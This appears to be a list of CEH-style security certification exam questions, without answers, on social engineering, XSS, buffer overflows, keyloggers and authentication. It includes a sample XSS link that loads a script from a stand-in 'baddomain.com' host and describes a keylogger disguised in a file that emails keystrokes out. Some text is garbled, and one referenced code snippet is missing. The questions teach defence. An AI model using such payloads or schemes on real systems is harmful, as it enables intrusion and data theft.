What is Peter Smith talking about?
You went to great lengths to install all the necessary technologies to prevent hacking attacks,
such as expensive firewalls, antivirus software, anti-spam systems and intrusion
detection/prevention tools in your company’s network. You have configured the most secure
policies and tightened every device on your network. You are confident that hackers will never be
able to gain access to your network with complex security system in place. Your peer, Peter Smith
who works at the same department disagrees with you. He says even the best network security
technologies cannot prevent hackers gaining access to the network because of presence of
“weakest link” in the security chain. What is Peter Smith talking about?
How does a denial-of-service attack work?
How does a denial-of-service attack work?
How would you proceed?
You are trying to break into a highly classified top-secret mainframe computer with highest security
system in place at Merclyn Barley Bank located in Los Angeles. You know that conventional
hacking doesn’t work in this case, because organizations such as banks are generally tight and
secure when it comes to protecting their systems. In other words you are trying to penetrate an
otherwise impenetrable system. How would you proceed?
What is this attack?
This is an attack that takes advantage of a web site vulnerability in which the site displays content
that includes un-sanitized user-provided data.
<ahref=”http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js
%22%3E%3C/script%3E”>See foobar</a>
What is this attack?
hown above?
Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The
programmer makes an assumption that 200 characters are more than enough. Because there
were no proper boundary checks being conducted, Bob decided to insert 400 characters into the
200-character buffer. (Overflows the buffer). Below is the code snippet:
How can you protect/fix the problem of your application as shown above?
Which of the following encryption is NOT based on block cipher?
Which of the following encryption is NOT based on block cipher?
What technique has Michael used to disguise this keylogging software?
Michael is a junior security analyst working for the National Security Agency (NSA) working
primarily on breaking terrorist encrypted messages. The NSA has a number of methods they use
to decipher encrypted messages including Government Access to Keys (GAK) and inside
informants. The NSA holds secret backdoor keys to many of the encryption algorithms used on the
Internet. The problem for the NSA, and Michael, is that terrorist organizations are starting to use
custom-built algorithms or obscure algorithms purchased from corrupt governments. For this
reason, Michael and other security analysts like him have been forced to find different methods of
deciphering terrorist messages. One method that Michael thought of using was to hide malicious
code inside seemingly harmless programs. Michael first monitors sites and bulletin boards used by
known terrorists, and then he is able to glean email addresses to some of these suspected
terrorists. Michael then inserts a stealth keylogger into a mapping program file readme.txt and then
sends that as an attachment to the terrorist. This keylogger takes screenshots every 2 minutes
and also logs all keyboard activity into a hidden file on the terrorist’s computer. Then, the
keylogger emails those files to Michael twice a day with a built in SMTP server. What technique
has Michael used to disguise this keylogging software?
In which step Steganography fits in CEH System Hacking Cycle (SHC)
In which step Steganography fits in CEH System Hacking Cycle (SHC)
Which definition below best describes a covert channel?
Which definition below best describes a covert channel?
What type of device should Joseph use for two-factor authentication?
Joseph has just been hired on to a contractor company of the Department of Defense as their
Senior Security Analyst. Joseph has been instructed on the company’s strict security policies that
have been implemented, and the policies that have yet to be put in place. Per the Department of
Defense, all DoD users and the users of their contractors must use two-factor authentication to
access their networks. Joseph has been delegated the task of researching and implementing the
best two-factor authentication method for his company. Joseph’s supervisor has told him that they
would like to use some type of hardware device in tandem with a security or identifying pin
number. Joseph’s company has already researched using smart cards and all the resources
needed to implement them, but found the smart cards to not be cost effective. What type of device
should Joseph use for two-factor authentication?